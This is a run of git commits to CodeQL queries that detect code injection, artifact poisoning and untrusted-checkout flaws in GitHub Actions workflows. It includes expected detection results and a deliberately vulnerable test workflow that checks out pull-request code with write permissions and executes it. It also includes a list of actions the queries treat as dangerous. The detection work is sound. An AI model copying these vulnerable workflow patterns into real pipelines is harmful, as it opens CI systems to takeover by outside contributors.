.github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref new file mode 100644 index 00000000000..f7ce5674994 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref deleted file mode 100644 index fbd758b6bd6..00000000000 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/PrivilegedCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml new file mode 100644 index 00000000000..0913ac8bbcf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml @@ -0,0 +1,21 @@ +name: Actor + +on: pull_request + +permissions: + contents: write + +jobs: + template-oss: + name: test + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + runs-on: ubuntu-latest + defaults: + run: + shell: bash + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref deleted file mode 100644 index 21d37e957a1..00000000000 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-829/ArtifactPoisoning.ql - diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected similarity index 73% rename from ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected rename to ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 2819bf62fdf..a792da27900 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -41,16 +41,16 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | -| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref new file mode 100644 index 00000000000..4f8d2af04e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningCritical.ql + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected rename to ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref new file mode 100644 index 00000000000..39548f27412 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningMedium.ql + diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref deleted file mode 100644 index 3c8de29c450..00000000000 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-829/PrivilegedArtifactPoisoning.ql - diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref deleted file mode 100644 index 8fe52c7d914..00000000000 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref deleted file mode 100644 index 32953132a45..00000000000 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref new file mode 100644 index 00000000000..9f17733e16e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutCritical.ql diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref new file mode 100644 index 00000000000..66b3f2cd9bf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutHigh.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref new file mode 100644 index 00000000000..55bb194f5ec --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutMedium.ql From e86fa9744aef3783108d225812be2e528ef116c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 21 May 2024 23:05:30 +0200 Subject: [PATCH 0303/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b1a100a7040..b3f4a7b112e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.26 +version: 0.0.27 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 341b6f45c29..c0aa886d042 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.26 +version: 0.0.27 groups: - actions - queries From 4d28d6aa7c74ac627926882a9997c4cb95d65b6c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 11:07:52 +0200 Subject: [PATCH 0304/1267] Improve toctou queries --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 - 3 files changed, 2 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 2144db7afa0..ff9148ab583 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,7 +18,7 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where // the job can be triggered by an external user - check.getEnclosingJob().isExternallyTriggerable() and + inPrivilegedExternallyTriggerableJob(check) and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 11dfa7fc567..c1118bc00ca 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -18,7 +18,7 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where // the job can be triggered by an external user - check.getEnclosingJob().isExternallyTriggerable() and + inPrivilegedExternallyTriggerableJob(check) and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 298c4ce75a4..4fb130aa07a 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -233,7 +233,6 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | From 367531a6597fcfd5a09735bd7c9e9a372ea6a446 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 11:08:22 +0200 Subject: [PATCH 0305/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b3f4a7b112e..649064e1ddd 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.27 +version: 0.0.28 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c0aa886d042..d0d7e48a1b2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.27 +version: 0.0.28 groups: - actions - queries From 33ae3b1625dc60d5b9a8c32b1e70fe0920395c17 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 18:53:39 +0200 Subject: [PATCH 0306/1267] minor updates --- .../actions/security/PoisonableSteps.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 4 +-- .../CWE-349/.github/workflows/test17.yml | 27 +++++++++++++++++++ 3 files changed, 30 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 40dfbd3a0b0..646dc35d1f4 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -5,7 +5,7 @@ abstract class PoisonableStep extends Step { } // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby", "actions/jekyll-build-pages"] } class DangerousActionUsesStep extends PoisonableStep, UsesStep { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index aeceaa8da75..3bc1f3649a3 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ 